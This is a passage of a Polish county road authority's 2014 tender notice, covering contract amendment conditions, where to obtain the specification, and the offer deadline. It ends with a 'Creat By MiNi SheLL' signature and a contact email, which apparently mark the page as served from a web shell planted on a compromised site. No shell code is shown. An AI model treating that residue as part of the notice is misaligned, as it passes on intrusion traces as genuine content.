b) wzrostu  cen  wynikających  ze  zmiany  innych  niż  podatkowe  przepisy  prawa,  jeżeli  w  wyniku wprowadzenia tych zmian, wykonanie umowy groziłoby Wykonawcy rażącą stratą, a zmiany tej nie można było przewidzieć w chwili zawarcia umowy. 
Zaistnienie  powyższej  okoliczności  musi  być  udokumentowane  w  sposób  wykazujący  obiektywną  i niezależną od Wykonawcy nadzwyczajną zmianą okoliczności przy czym Zamawiający upoważniony jest do żądania od Wykonawcy stosownych do okoliczności dokumentów. 
c) wystąpienia  zamówienia  uzupełniającego  stanowiącego  nie  więcej  niż  50%  zamówienia podstawowego za zgodą Zamawiającego i na warunkach określonych w pkt. 6 SIWZ.
- Przekształcenia  Wykonawcy  będącego  osoba  prawną  lub  spółka  osobowa  lub  cywilną  w  inna spółkę  prawa  handlowego  w  trybie  przekształcenia  spółki  zgodnie  z  przepisami  Ustawy  Kodeks Spółek Handlowych.
- Zmiany  regulacji  prawnych  wprowadzonych  w  życie  po  dacie  podpisania  umowy,  wywołujących potrzebę zmiany umowy wraz ze skutkami wprowadzenia takiej zmiany. 
Zmiany uzasadnione okolicznościami, o których mowa w art. 3571 k.c. - Jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażąco stratą, czego strony nie przewidziały przy zawarciu umowy, sąd może po rozważeniu interesów stron, zgodnie z zasadami współżycia społecznego, oznaczać sposób wykonania zobowiązania, wysokość świadczenia lub nawet orzec o rozwiązaniu umowy.
Wszystkie powyższe postanowienia stanowią katalog zmian, na które zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
Nie stanowią natomiast zmiany istotnej umowy w rozumieniu art. 144 ustawy PZP zmiany związane z obsługą administracyjno-organizacyjną umowy ( np. zmiana rachunku bankowego lub zmiana danych teleadresowych)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat.swiecki.lo.pl/?app=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg 86-100 Świecie, ul. Gen. Józefa Hallera 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2014 godzina 10:00, miejsce: Powiatowy Zarząd Dróg 86-100 Świecie, ul. Gen. Józefa Hallera 9, Pokój 415.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com